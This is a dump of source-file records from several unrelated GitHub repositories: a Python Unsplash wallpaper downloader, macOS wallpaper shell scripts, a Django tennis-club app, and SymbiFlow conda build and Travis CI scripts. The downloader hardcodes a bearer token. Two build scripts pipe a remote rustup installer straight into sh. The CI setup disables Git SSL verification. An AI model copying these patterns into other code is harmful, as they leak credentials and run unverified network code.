Safari/537.36'\n\theaders\t\t=\t{\n\t\t\t\t\t\t'User-Agent':userAgent,\n\t\t\t\t\t\t'Accept':'text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8',\n\t\t\t\t\t\t'authorization':'Bearer def5b99dc6ec754bee5891044243eea0f021af474f74a465f3c508fe9a7415e6'\n\t\t\t\t\t}\n\tdata\t\t=\turllib.urlencode({})\n\trequest \t=\turllib2.Request(url+'?'+data,headers=headers)\n\n\ttry:\n\t\tprint \"开始访问unsplash.com\"\n\t\tresponse \t= \turllib2.urlopen(request)\n\t\tbody = response.read().decode('utf-8');\n\t\tbody = json.loads(body)\n\t\t# print body\n\t\t# return;\n\n\t\tfor wallpaperItem in body:\n\n\t\t\tprint '===='*10\n\n\t\t\tfile_name \t\t=\t wallpaperItem['id']# + '.jpg'\n\t\t\timg_url\t\t\t=\t wallpaperItem['links']['download']\n\n\t\t\tprint file_name + \"\\n\" + img_url\n\n\t\t\tpath = dicPath + '/' + file_name\n\t\t\tif os.path.exists(path):\n\t\t\t\tprint('重复'+str(file_name))\n\t\t\t\tpass\n\t\t\telse:\n\t\t\t\tprint('下载'+str(file_name))\n\t\t\t\ttempResponse = urllib2.urlopen(urllib2.Request(img_url))\n\t\t\t\timg_data = tempResponse.read()\n\t\t\t\tprint('保存'+str(file_name))\n\t\t\t\toutput = open(path, 'wb')\n\t\t\t\toutput.write(img_data)\n\t\t\t\toutput.close()\n\n\n\texcept urllib2.URLError, e:\n\t\tprint 'error - %d' % (e.code)\n\n\t# return liveList\n\n\n\n\nprint getPhotoList(\"https://unsplash.com/napi/photos?page=1&per_page=30&order_by=latest\")\n\n\n\n\n\n" }, { "alpha_fraction": 0.7510373592376709, "alphanum_fraction": 0.7634854912757874, "avg_line_length": 20.81818199157715, "blob_id": "6ac5eba56cae15848761b1caab2ac6ed314c7865", "content_id": "4ec6a43bbe693d094223404d2ad2eeba04a715d6", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Shell", "length_bytes": 245, "license_type": "no_license", "max_line_length": 118, "num_lines": 11, "path": "/CopyLrvueImage.sh", "repo_name": "anmac/ACWallpaper", "src_encoding": "UTF-8", "text": "\nmkdir -p ~/Pictures/copyLrvue\n\ncp ~/Library/Containers/com.leonspok.osx.Irvue/Data/Library/Application\\ Support/Irvue/unsplash_* ~/Pictures/copyLrvue\n\necho \"copy - \"\n\nsleep 600\n\necho \"递归\"\n\nsh ~/Nut/python/demo/ACWallpaper/CopyLrvueImage.sh\n" }, { "alpha_fraction": 0.6659142374992371, "alphanum_fraction": 0.6659142374992371, "avg_line_length": 32.769229888916016, "blob_id": 
"40226638000051d0d2260371e57d69b30cc73c3a", "content_id": "162b4f28a17d941326baa7b7360f28c99ab461a3", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Shell", "length_bytes": 535, "license_type": "no_license", "max_line_length": 100, "num_lines": 13, "path": "/wallpaper_bing.sh", "repo_name": "anmac/ACWallpaper", "src_encoding": "UTF-8", "text": "#提取壁纸图片URL\nurl=$(expr \"$(curl http://cn.bing.com/?mkt=zh-CN |grep hprichbg)\" : \".*g_img={url: \\\"\\(.*\\)\\\",id.*\")\necho url=${url}\n#提取图片名称\nfilename=$(expr \"$url\" : \".*/\\(.*\\)\")\necho filename=${filename}\n#本地图片地址-当前用户下缺省图片目录\nlocalpath=\"/Users/$USER/Pictures/$filename\"\necho localpath=${localpath}\n#下载图片至本地\ncurl -o $localpath $url\n#调用Finder应用切换桌面壁纸\nosascript -e \"tell application \\\"Finder\\\" to set desktop picture to POSIX file \\\"$localpath\\\"\"\n\n\n\n\n" } ]
3
Championzb/TennisClub
https://github.com/Championzb/TennisClub
2f558b4452c5e6cf9b095d5ea57f43d65d66505e
1cbb764b30d127a55f51ca624aa832adb362bd74
d22fd0169fa4eeddc90618fa98aedd56b0ca7c7e
refs/heads/master
2020-12-25T04:30:06.631717
2014-05-22T00:01:01
2014-05-22T00:01:01
null
0
0
null
null
null
null
null
[ { "alpha_fraction": 0.7518796920776367, "alphanum_fraction": 0.7518796920776367, "avg_line_length": 26.60377311706543, "blob_id": "39f469868a7056675df275d43f0dde0cd6af2067", "content_id": "03c6c55e458d060d49fe7cd2bba985b66dc0c7a8", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1463, "license_type": "no_license", "max_line_length": 59, "num_lines": 53, "path": "/TennisFansA/Account/views.py", "repo_name": "Championzb/TennisClub", "src_encoding": "UTF-8", "text": "from django.shortcuts import render_to_response\nfrom admin import UserCreationForm\nfrom django.core.context_processors import csrf\nfrom django.http import HttpResponseRedirect\nfrom models import MyUser\nfrom django.contrib import auth\nfrom django.http import HttpResponse\nfrom django.template import RequestContext\nfrom LeagueMatch.models import LeagueMatch\n\n\ndef Register(request):\n\tif request.method == 'POST':\n\t\tform = UserCreationForm(request.POST)\n\t\tif form.is_valid():\n\t\t\tform.save()\n\t\t\treturn HttpResponseRedirect('/Account/Register_Success')\n\telse:\n\t\tform = UserCreationForm()\n\n\targs = {}\n\targs.update(csrf(request))\n\n\targs['form']=form\n\n\treturn render_to_response('register.html', args)\n\ndef Register_Success(request):\n\treturn render_to_response('register_success.html')\n\ndef Login(request):\n\tc = {}\n\tc.update(csrf(request))\n\treturn render_to_response('login.html',c)\n\ndef Login_Success(request):\n\treturn render_to_response('login_success.html',\n\t\t\t\t\t\t\t{'email': request.user.email,\n\t\t\t\t\t\t\t 'league_matches': LeagueMatch.objects.all()})\n\t\ndef auth_view(request):\n\temail = request.POST.get('email', '')\n\tpassword = request.POST.get('password', '')\n\tuser = auth.authenticate(email=email,password=password)\n\t\n\tif user is not None: \n\t\tauth.login(request, user)\t\n\t\treturn HttpResponseRedirect('/Account/Login_Success')\n\telse:\n\t\treturn HttpResponseRedirect('/Account/Login_Failure')\n\ndef Login_Failure(request):\n\treturn render_to_response('login_failure.html')\n" }, { "alpha_fraction": 0.8402777910232544, "alphanum_fraction": 0.8402777910232544, "avg_line_length": 27.799999237060547, "blob_id": "261e0b2ac9e0d3eb8fadcfabcba3711aa27a07a7", "content_id": "9c0d678a8ca2ac6dbd90ea4e532e5e44f9a3b3d2", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 144, "license_type": "no_license", "max_line_length": 49, "num_lines": 5, "path": "/TennisFansA/LeagueMatch/admin.py", "repo_name": "Championzb/TennisClub", "src_encoding": "UTF-8", "text": "from django.contrib import admin\nfrom LeagueMatch.models import LeagueMatch, Match\n\nadmin.site.register(LeagueMatch)\nadmin.site.register(Match)\n" }, { "alpha_fraction": 0.720678985118866, "alphanum_fraction": 0.7438271641731262, "avg_line_length": 29.85714340209961, "blob_id": "3246add36de3748e8b054c664fa302ea20d32b63", "content_id": "2b558782c0052b622b5e82e22b124f24d6137b27", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 648, "license_type": "no_license", "max_line_length": 64, "num_lines": 21, "path": "/TennisFansA/LeagueMatch/models.py", "repo_name": "Championzb/TennisClub", "src_encoding": "UTF-8", "text": "from django.db import models\nfrom Account.models import MyUser\n\nclass LeagueMatch(models.Model):\n\n\tCITY=(('1','Suzhou'),('2','Beijing'),('3','Shanghai'))\n\n\tname = models.CharField(max_length=100)\n\tstart_date = 
models.DateField()\n\tfinish_date = models.DateField()\n\tcity = models.CharField(max_length=3,choices=CITY, default='1')\n\tplayer = models.ManyToManyField(MyUser,blank=True)\n\n\t\n\nclass Match(models.Model):\n\tleagueMatch = models.ForeignKey(LeagueMatch)\n\tdate = models.DateField()\n\tplayer1 = models.ForeignKey(MyUser,related_name='player1')\n\tplayer2 = models.ForeignKey(MyUser,related_name='player2')\n\tscore = models.CharField(max_length = 200)\n" }, { "alpha_fraction": 0.741134762763977, "alphanum_fraction": 0.7446808218955994, "avg_line_length": 28.526315689086914, "blob_id": "6700e4f066e81d3fee1def6f2bd83899ee677a6e", "content_id": "77643c46206c70d8cdc9154ed1c50fd8973d8e52", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 564, "license_type": "no_license", "max_line_length": 69, "num_lines": 19, "path": "/TennisFansA/UserProfile/forms.py", "repo_name": "Championzb/TennisClub", "src_encoding": "UTF-8", "text": "from django import forms\nfrom models import Profile\nfrom localflavor.cn.forms import CNCellNumberField, CNProvinceSelect \n\nclass UserProfileForm(forms.ModelForm):\n\tphone = CNCellNumberField ()\n#\tprovince = forms.CharField(max_length=50,widget=CNProvinceSelect)\n\t\n\tclass Meta:\n\t\tmodel = Profile\n\t\tfields = ('username','level','gender','city')\n\n\tdef save(self,commit=True):\n\t\tform = super(UserProfileForm,self).save(commit=False)\n\t\tform.phone = self.cleaned_data['phone']\n#\t\tform.province = self.cleaned_data['province']\n\t\tif commit:\n\t\t\tform.save()\n\t\treturn form\n\n\t\n" }, { "alpha_fraction": 0.5666666626930237, "alphanum_fraction": 0.5666666626930237, "avg_line_length": 7.5714287757873535, "blob_id": "613273974159e7b832814a001ff28bb7fa3711dd", "content_id": "ee77f1726a379fdbdd72538541cf5692dccbedaa", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 60, "license_type": "no_license", "max_line_length": 12, "num_lines": 7, "path": "/README.md", "repo_name": "Championzb/TennisClub", "src_encoding": "UTF-8", "text": "TennisClub\nMy commit\nFuck Haochen\n==========\n++++++\n\nksjdflksdjfl\n" }, { "alpha_fraction": 0.5490909218788147, "alphanum_fraction": 0.6242424249649048, "avg_line_length": 47.52941131591797, "blob_id": "e9deccd9448270df8150d35d3bb98b6ada0d9690", "content_id": "8b6a503ebdfab92b059fccf3166dd5d1642c79fc", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 825, "license_type": "no_license", "max_line_length": 177, "num_lines": 17, "path": "/TennisFansA/UserProfile/models.py", "repo_name": "Championzb/TennisClub", "src_encoding": "UTF-8", "text": "from django.db import models\nfrom Account.models import MyUser\n\n\nclass Profile(models.Model):\n\tLEVEL=(('1','1'),('1.5','1.5'),('2','2'),('2.5','2.5'),('3','3'),('3.5','3.5'),('4','4'),('4.5','4.5'),('5','5'),('5.5','5.5'),('6','6'),('6.5','6.5'),('7','7'),('7.5','7.5'),)\n\tGENDER=(('0','male'),('1','female'))\n\tCITY=(('1','Suzhou'),('2','Beijing'),('3','Shanghai'))\n\tuser = models.OneToOneField(MyUser,primary_key=True)\n\tusername = models.CharField(max_length = 100)\n\tlevel = models.CharField(max_length=15, choices=LEVEL, default='3')\n\tphone = models.CharField(max_length=11)\n#\tprovince = models.CharField(max_length=100)\n\tgender = models.CharField(max_length=2, choices=GENDER)\n\tcity = models.CharField(max_length=3,choices=CITY, default='1')\n\t\nMyUser.profile = property(lambda u: 
Profile.objects.get_or_create(user=u)[0])\n" }, { "alpha_fraction": 0.6876574158668518, "alphanum_fraction": 0.6876574158668518, "avg_line_length": 38.70000076293945, "blob_id": "881761b8caca7e09a6907cd8afe7066c721b02c2", "content_id": "e676facf3b4e0e3bd44f0aeae6b4feeadbd8de28", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 397, "license_type": "no_license", "max_line_length": 63, "num_lines": 10, "path": "/TennisFansA/Account/urls.py", "repo_name": "Championzb/TennisClub", "src_encoding": "UTF-8", "text": "from django.conf.urls import patterns, include, url\nurlpatterns = patterns('',\n\turl(r'^Register/$', 'Account.views.Register'),\n\turl(r'^Register_Success/$', 'Account.views.Register_Success'),\n\turl(r'^Login/$', 'Account.views.Login'),\n\turl(r'^Login_Success/$', 'Account.views.Login_Success'),\n\turl(r'^auth/$', 'Account.views.auth_view'),\n\turl(r'^Login_Failure/$', 'Account.views.Login_Failure'),\n\n)\n" } ]
7
SymbiFlow/conda-packages
https://github.com/SymbiFlow/conda-packages
4670c4b71514ffa8b5f63fe1a92fbafb69ef5649
b5801b746eb21e8eff8050e74916e2cfdc83c6ae
a2b9f83788d78af67a113d10703c42fc5de52dee
refs/heads/master
2022-03-13T10:28:47.592274
2020-12-31T07:57:10
2020-12-31T07:57:10
144,771,639
3
12
Apache-2.0
2018-08-14T21:00:21
2020-12-31T07:57:14
2022-02-25T17:26:59
Shell
[ { "alpha_fraction": 0.694915235042572, "alphanum_fraction": 0.7097457647323608, "avg_line_length": 23.842105865478516, "blob_id": "67ff28762043cb11df71881ddfe0fcd1d25bdf76", "content_id": "044c02bccf788240287e15203b18caee65552c5e", "detected_licenses": [ "Apache-2.0" ], "is_generated": false, "is_vendor": false, "language": "Shell", "length_bytes": 472, "license_type": "permissive", "max_line_length": 60, "num_lines": 19, "path": "/.travis/before_cache.sh", "repo_name": "SymbiFlow/conda-packages", "src_encoding": "UTF-8", "text": "#!/bin/bash\n\nsource .travis/common.sh\nset -e\n\n# Close the after_success.1 fold travis has created already.\ntravis_fold end before_cache\n\nstart_section \"conda.clean.1\" \"${GREEN}Clean status...${NC}\"\n#conda clean -s --dry-run\nend_section \"conda.clean.1\"\n\nstart_section \"conda.clean.2\" \"${GREEN}Cleaning...${NC}\"\nconda build purge\nend_section \"conda.clean.2\"\n\nstart_section \"conda.clean.3\" \"${GREEN}Clean status...${NC}\"\n#conda clean -s --dry-run\nend_section \"conda.clean.3\"\n" }, { "alpha_fraction": 0.6000000238418579, "alphanum_fraction": 0.6028571724891663, "avg_line_length": 20.875, "blob_id": "430a240527ce5a07f55e8a3ecda48571b13b195d", "content_id": "96fb19355db533cdce238a829a129d6f73a00392", "detected_licenses": [ "Apache-2.0" ], "is_generated": false, "is_vendor": false, "language": "Shell", "length_bytes": 350, "license_type": "permissive", "max_line_length": 69, "num_lines": 16, "path": "/flterm/build.sh", "repo_name": "SymbiFlow/conda-packages", "src_encoding": "UTF-8", "text": "#!/bin/bash\n\nif [ x\"$TRAVIS\" = xtrue ]; then\n\tCPU_COUNT=2\nfi\n\nset -x\nset -e\n\nmake CC=\"gcc -I.\"\nmake PREFIX=$PREFIX install\n\ngit describe | sed -e's/-/_/g' -e's/^v//' > ./__conda_version__.txt\ntouch .buildstamp\nTZ=UTC date +%Y%m%d_%H%M%S -r .buildstamp > ../__conda_buildstr__.txt\nTZ=UTC date +%Y%m%d%H%M%S -r .buildstamp > ../__conda_buildnum__.txt\n" }, { "alpha_fraction": 0.6653226017951965, "alphanum_fraction": 0.6693548560142517, "avg_line_length": 14.5, "blob_id": "1b1ef20ee91a372cab7fb3a035be8016bf07c63e", "content_id": "f4846da5a2793b3fb2fa21d2a49c4f914716850c", "detected_licenses": [ "Apache-2.0" ], "is_generated": false, "is_vendor": false, "language": "Shell", "length_bytes": 248, "license_type": "permissive", "max_line_length": 49, "num_lines": 16, "path": "/moore/build.sh", "repo_name": "SymbiFlow/conda-packages", "src_encoding": "UTF-8", "text": "#!/bin/bash\n\nset -e\nset -x\n\nif [ x\"$TRAVIS\" = xtrue ]; then\n\tCPU_COUNT=2\nfi\n\ncurl https://sh.rustup.rs -sSf | sh -s -- -y\nsource $HOME/.cargo/env\n\ncargo build --release\ninstall -D target/release/moore $PREFIX/bin/moore\n\n$PREFIX/bin/moore --version\n" }, { "alpha_fraction": 0.6907426118850708, "alphanum_fraction": 0.6988809704780579, "avg_line_length": 24.86842155456543, "blob_id": "12d8ca5b0189201e782f1e5d0e0ea79c221dc0a2", "content_id": "4343e0fec8549614a01d7edcea14f0ab3102dfd4", "detected_licenses": [ "Apache-2.0" ], "is_generated": false, "is_vendor": false, "language": "Shell", "length_bytes": 983, "license_type": "permissive", "max_line_length": 109, "num_lines": 38, "path": "/.travis/after_success.sh", "repo_name": "SymbiFlow/conda-packages", "src_encoding": "UTF-8", "text": "#!/bin/bash\n\nsource .travis/common.sh\nset -e\n\n# Close the after_success fold travis has created already.\ntravis_fold end after_success\n\n# Remove trailing ';' and split CONDA_OUT into array of packages\nIFS=';' read -r -a PACKAGES <<< \"${CONDA_OUT%?}\"\n\nstart_section 
\"package.contents\" \"${GREEN}Package contents...${NC}\"\nfor element in \"${PACKAGES[@]}\"\ndo\n\ttar -jtf $element | sort\ndone\nend_section \"package.contents\"\n\nif [ x$TRAVIS_BRANCH = x\"master\" -a x$TRAVIS_EVENT_TYPE != x\"cron\" -a x$TRAVIS_PULL_REQUEST == xfalse ]; then\n\t$SPACER\n\n\tfor element in \"${PACKAGES[@]}\"\n\tdo\n\t\tstart_section \"package.upload\" \"${GREEN}Package uploading...${NC}\"\n\t\tanaconda -t $ANACONDA_TOKEN upload --user $ANACONDA_USER --label main $element\n\t\tend_section \"package.upload\"\n\tdone\n\nfi\n\n$SPACER\n\nstart_section \"success.tail\" \"${GREEN}Success output...${NC}\"\necho \"Log is $(wc -l /tmp/output.log) lines long.\"\necho \"Displaying last 1000 lines\"\necho\ntail -n 1000 /tmp/output.log\nend_section \"success.tail\"\n" }, { "alpha_fraction": 0.6219512224197388, "alphanum_fraction": 0.6341463327407837, "avg_line_length": 17.923076629638672, "blob_id": "9a6819dd4b0dc59ca1b54f578c606af2667df25f", "content_id": "b3e08ff986fb128dd55072114426873d07dc4f6b", "detected_licenses": [ "Apache-2.0" ], "is_generated": false, "is_vendor": false, "language": "Shell", "length_bytes": 984, "license_type": "permissive", "max_line_length": 68, "num_lines": 52, "path": "/verilator/run_test.sh", "repo_name": "SymbiFlow/conda-packages", "src_encoding": "UTF-8", "text": "#!/bin/bash\n\nset -e\nset +x\n\n$PREFIX/bin/verilator -V\n#$PREFIX/bin/verilator --help || true\n\nfunction run {\n\tFILENAME=$1\n\trm -rf sim_main.cpp\n\trm -rf obj_dir\n\n\tcat <<EOF >sim_main.cpp\n#include \"V$FILENAME.h\"\n#include \"verilated.h\"\nint main(int argc, char **argv, char **env) {\n Verilated::commandArgs(argc, argv);\n V$FILENAME* top = new V$FILENAME;\n while (!Verilated::gotFinish()) { top->eval(); }\n exit(0);\n}\nEOF\n\t$PREFIX/bin/verilator --cc $FILENAME.v $2 $3 --exe sim_main.cpp\n\tcd obj_dir\n\tcat V$FILENAME.mk\n\tmake -j -f V$FILENAME.mk V$FILENAME\n\tcd ..\n\tobj_dir/V$FILENAME\n\n\trm -rf sim_main.cpp\n\trm -rf obj_dir\n}\n\ncd test\n\n# Hello world test\necho\necho\necho \"Hello World Test =====\"\nrun hello_world\necho \"----------------------\"\n\n# Counter\necho\necho\necho \"Counter Test =========\"\n# FIXME\n# %Error: counter_tb.v:21: Unsupported or unknown PLI call: $monitor\n# %Error: counter.v:18: Unsupported: Verilog 1995 deassign\n#run counter_tb counter.v\necho \"----------------------\"\n" }, { "alpha_fraction": 0.6490066051483154, "alphanum_fraction": 0.6556291580200195, "avg_line_length": 11.583333015441895, "blob_id": "5da42a8c2aa25492f69388e5925e121da75d4adf", "content_id": "4f82d58fac3f03860a6d4be073e4e1ba0971af87", "detected_licenses": [ "Apache-2.0" ], "is_generated": false, "is_vendor": false, "language": "Shell", "length_bytes": 151, "license_type": "permissive", "max_line_length": 38, "num_lines": 12, "path": "/odin_II/build.sh", "repo_name": "SymbiFlow/conda-packages", "src_encoding": "UTF-8", "text": "#!/bin/bash\n\nset -e\nset -x\n\nif [ x\"$TRAVIS\" = xtrue ]; then\n\tCPU_COUNT=2\nfi\n\ncd ODIN_II\nmake build -j$CPU_COUNT\ninstall -D odin_II $PREFIX/bin/odin_II\n" }, { "alpha_fraction": 0.7119205594062805, "alphanum_fraction": 0.7185430526733398, "avg_line_length": 11.583333015441895, "blob_id": "e9a1659754ed63d73a33a230edf70e96e7f430af", "content_id": "bf1ff7ca397526d33bbe94d0e5f43944a041a255", "detected_licenses": [ "Apache-2.0" ], "is_generated": false, "is_vendor": false, "language": "Shell", "length_bytes": 302, "license_type": "permissive", "max_line_length": 37, "num_lines": 24, "path": "/antmicro-yosys/build.sh", 
"repo_name": "SymbiFlow/conda-packages", "src_encoding": "UTF-8", "text": "#!/bin/bash\n\nset -e\nset -x\n\nif [ x\"$TRAVIS\" = xtrue ]; then\n\tCPU_COUNT=2\nfi\n\n#unset CFLAGS\n#unset CXXFLAGS\n#unset CPPFLAGS\n#unset DEBUG_CXXFLAGS\n#unset DEBUG_CPPFLAGS\n#unset LDFLAGS\n\nwhich pkg-config\n\ncd yosys\n\nmake V=1 -j$CPU_COUNT\ncp yosys \"$PREFIX/bin/antmicro-yosys\"\n\n$PREFIX/bin/antmicro-yosys -V\n" }, { "alpha_fraction": 0.5857843160629272, "alphanum_fraction": 0.6066176295280457, "avg_line_length": 26.6610164642334, "blob_id": "dd2f862b2d420390bc8ea1668ddd40b020a771a4", "content_id": "227bc2cac012aaf4aea830a7d0be951bfc434dd8", "detected_licenses": [ "Apache-2.0" ], "is_generated": false, "is_vendor": false, "language": "Shell", "length_bytes": 3264, "license_type": "permissive", "max_line_length": 166, "num_lines": 118, "path": "/.travis/common.sh", "repo_name": "SymbiFlow/conda-packages", "src_encoding": "UTF-8", "text": "# Some colors, use it like following;\n# echo -e \"Hello ${YELLOW}yellow${NC}\"\nGRAY=' \\033[0;30m'\nRED=' \\033[0;31m'\nGREEN=' \\033[0;32m'\nYELLOW=' \\033[0;33m'\nPURPLE=' \\033[0;35m'\nNC='\\033[0m' # No Color\n\nSPACER=\"echo -e ${GRAY} - ${NC}\"\n\nexport -f travis_nanoseconds\nexport -f travis_fold\nexport -f travis_time_start\nexport -f travis_time_finish\n\nTRAVIS_MAX_TIME=50\n\n# Override default travis_wait to pipe the output\ntravis_wait() {\n\tlocal timeout=\"${1}\"\n\n\tif [[ \"${timeout}\" =~ ^[0-9]+$ ]]; then\n\t\tshift\n\telse\n\t\ttimeout=20\n\tfi\n\n\tlocal cmd=(\"${@}\")\n\tlocal log_file=\"travis_wait_${$}.log\"\n\n\t\"${cmd[@]}\" &\n\tlocal cmd_pid=\"${!}\"\n\n\ttravis_jigger \"${!}\" \"${timeout}\" \"${cmd[@]}\" &\n\tlocal jigger_pid=\"${!}\"\n\tlocal result\n\n\t{\n\t\twait \"${cmd_pid}\" 2>/dev/null\n\t\tresult=\"${?}\"\n\t\tps -p\"${jigger_pid}\" &>/dev/null && kill \"${jigger_pid}\"\n\t}\n\n\tif [[ \"${result}\" -eq 0 ]]; then\n\t\tprintf \"\\\\n${ANSI_GREEN}The command %s exited with ${result}.${ANSI_RESET}\\\\n\" \"${cmd[*]}\"\n\telse\n\t\tprintf \"\\\\n${ANSI_RED}The command %s exited with ${result}.${ANSI_RESET}\\\\n\" \"${cmd[*]}\"\n\tfi\n\n\techo -e \"\\\\n${ANSI_GREEN}Log:${ANSI_RESET}\\\\n\"\n\n\treturn \"${result}\"\n}\n\n# Override default travis_jigger to print invisible character to keep build alive\ntravis_jigger() {\n\tlocal cmd_pid=\"${1}\"\n\tshift\n\tlocal timeout=\"${1}\"\n\tshift\n\tlocal count=0\n\n\techo -e \"\\\\n\"\n\n\twhile [[ \"${count}\" -lt \"${timeout}\" ]]; do\n\t\tcount=\"$((count + 1))\"\n\t\t# print invisible character\n\t\techo -ne \"\\xE2\\x80\\x8B\"\n\t\tsleep 60\n\tdone\n\n\techo -e \"\\\\n${ANSI_RED}Timeout (${timeout} minutes) reached. 
Terminating \\\"${*}\\\"${ANSI_RESET}\\\\n\"\n\tkill -9 \"${cmd_pid}\"\n}\n\nif [ -z \"$DATE_STR\" ]; then\n\texport DATE_TS=\"$(git log --format=%ct -n1)\"\n\texport DATE_NUM=\"$(date --date=@${DATE_TS} -u +%Y%m%d%H%M%S)\"\n\texport DATE_STR=\"$(date --date=@${DATE_TS} -u +%Y%m%d_%H%M%S)\"\n\techo \"Setting date number to $DATE_NUM\"\n\techo \"Setting date string to $DATE_STR\"\nfi\n\nfunction start_section() {\n\ttravis_fold start \"$1\"\n\ttravis_time_start\n\techo -e \"${PURPLE}${PACKAGE}${NC}: - $2${NC}\"\n\techo -e \"${GRAY}-------------------------------------------------------------------${NC}\"\n}\n\nfunction end_section() {\n\techo -e \"${GRAY}-------------------------------------------------------------------${NC}\"\n\ttravis_time_finish\n\ttravis_fold end \"$1\"\n}\n\n# Disable this warning;\n# xxxx/conda_build/environ.py:377: UserWarning: The environment variable\n# 'TRAVIS' is being passed through with value 0. If you are splitting\n# build and test phases with --no-test, please ensure that this value is\n# also set similarly at test time.\nexport PYTHONWARNINGS=ignore::UserWarning:conda_build.environ\n\nexport BASE_PATH=\"/tmp/really-really-really-really-really-really-really-really-really-really-really-really-really-long-path\"\nexport CONDA_PATH=\"$BASE_PATH/conda\"\nmkdir -p \"$BASE_PATH\"\nexport PATH=\"$CONDA_PATH/bin:$PATH\"\n\nexport GIT_SSL_NO_VERIFY=1\nexport GITREV=\"$(git describe --long 2>/dev/null || echo \"unknown\")\"\nexport CONDA_BUILD_ARGS=$PACKAGE\nexport CONDA_OUT=\"$(conda render --output $CONDA_BUILD_ARGS 2> /dev/null | grep conda-bld | grep tar.bz2 | sed -e's/-[0-9]\\+\\.tar/*.tar/' -e's/-git//' | tr '\\n' ';')\"\n\necho \" GITREV: $GITREV\"\necho \" CONDA_PATH: $CONDA_PATH\"\necho \"CONDA_BUILD_ARGS: $CONDA_BUILD_ARGS\"\necho \" CONDA_OUT: $CONDA_OUT\"\n" }, { "alpha_fraction": 0.6759259104728699, "alphanum_fraction": 0.6790123581886292, "avg_line_length": 15.199999809265137, "blob_id": "3e043f8a98f26d08f80a0ca22a1932c91bbd3c89", "content_id": "f5609f132fa8eddb7981887cdd90c71ebce8cef8", "detected_licenses": [ "Apache-2.0" ], "is_generated": false, "is_vendor": false, "language": "Shell", "length_bytes": 324, "license_type": "permissive", "max_line_length": 78, "num_lines": 20, "path": "/verilator/build.sh", "repo_name": "SymbiFlow/conda-packages", "src_encoding": "UTF-8", "text": "#! 
/bin/bash\n\nset -e\nset -x\n\nif [ x\"$TRAVIS\" = xtrue ]; then\n\tCPU_COUNT=2\nfi\n\nunset VERILATOR_ROOT\nln -s /usr/bin/perl $PREFIX/bin/\nautoconf\n./configure \\\n --prefix=$PREFIX \\\n\nmake -j$CPU_COUNT\nmake install\n\n# Fix hard coded paths in verilator\nsed -i -e's-/.*_build_env/bin/--' $PREFIX/share/verilator/include/verilated.mk\n" }, { "alpha_fraction": 0.7277353405952454, "alphanum_fraction": 0.732824444770813, "avg_line_length": 22.058822631835938, "blob_id": "6d81c6e001e36345d72e1eb0c98f77485fc806c8", "content_id": "8809dcb90936624bc5d9c6130090a61610136830", "detected_licenses": [ "Apache-2.0" ], "is_generated": false, "is_vendor": false, "language": "Shell", "length_bytes": 393, "license_type": "permissive", "max_line_length": 59, "num_lines": 17, "path": "/uhdm-integration/build.sh", "repo_name": "SymbiFlow/conda-packages", "src_encoding": "UTF-8", "text": "#!/bin/bash\n\nset -e\nset -x\n\nif [ x\"$TRAVIS\" = xtrue ]; then\n\tCPU_COUNT=2\nfi\n\nexport PKG_CONFIG_PATH=\"$BUILD_PREFIX/lib/pkgconfig/\"\nexport CXXFLAGS=\"$CXXFLAGS -I$BUILD_PREFIX/include\"\nexport LDFLAGS=\"$CXXFLAGS -L$BUILD_PREFIX/lib -lrt -ltinfo\"\n\nmake -j$CPU_COUNT surelog/parse\nmake -j$CPU_COUNT uhdm/build\nmake -j$CPU_COUNT uhdm/verilator/build\nmake -j$CPU_COUNT ENABLE_READLINE=0 yosys/yosys\n\n" }, { "alpha_fraction": 0.6771929860115051, "alphanum_fraction": 0.680701732635498, "avg_line_length": 16.8125, "blob_id": "6b415266437d5a29088c942943fa2939dcc2ebe2", "content_id": "22e24f67cb28ed8f6f275a3dda568723afc0dce5", "detected_licenses": [ "Apache-2.0" ], "is_generated": false, "is_vendor": false, "language": "Shell", "length_bytes": 285, "license_type": "permissive", "max_line_length": 64, "num_lines": 16, "path": "/sv-parser/build.sh", "repo_name": "SymbiFlow/conda-packages", "src_encoding": "UTF-8", "text": "#!/bin/bash\n\nset -e\nset -x\n\nif [ x\"$TRAVIS\" = xtrue ]; then\n\tCPU_COUNT=2\nfi\n\ncurl https://sh.rustup.rs -sSf | sh -s -- -y\nsource $HOME/.cargo/env\n\ncargo build --example parse_sv --release\ninstall -D target/release/examples/parse_sv $PREFIX/bin/parse_sv\n\n$PREFIX/bin/parse_sv --version\n" }, { "alpha_fraction": 0.603412389755249, "alphanum_fraction": 0.6146483421325684, "avg_line_length": 19.024999618530273, "blob_id": "46393169c72df2dd5272e517ba9a17faceb9aff2", "content_id": "17a3ff214d7181eb9428eb5bd57877c59a861396", "detected_licenses": [ "Apache-2.0" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 2403, "license_type": "permissive", "max_line_length": 85, "num_lines": 120, "path": "/.travis-output.py", "repo_name": "SymbiFlow/conda-packages", "src_encoding": "UTF-8", "text": "#!/usr/bin/env python3\n\nimport io\nimport pexpect\nimport re\nimport string\nimport sys\nimport time\n\noutput_to=sys.stdout\n\nargs = list(sys.argv[1:])\nlogfile = open(args.pop(0), \"w\")\nchild = pexpect.spawn(' '.join(args))\n\ndef output_line(line_bits, last_skip):\n line = \"\".join(line_bits)\n line = re.sub(\"/really.*/conda/\", \"/.../conda/\", line)\n line = re.sub(\"/_b_env_[^/]*/\", \"/_b_env_.../\", line)\n sline = line.strip()\n\n skip = True\n if line.startswith(\" \") and not sline.startswith('/'):\n skip = False\n\n if \"da es fi\" in sline:\n skip = True\n if \"setting rpath\" in sline:\n skip = True\n\n if \"Entering directory\" in sline:\n skip = False\n sline = sline.split('make')[-1]\n\n if re.search(\"[0-9]+\\.[0-9]+\", line):\n skip = False\n\n if len(sline) > 1:\n if sline[0] in string.ascii_uppercase and sline[1] not in 
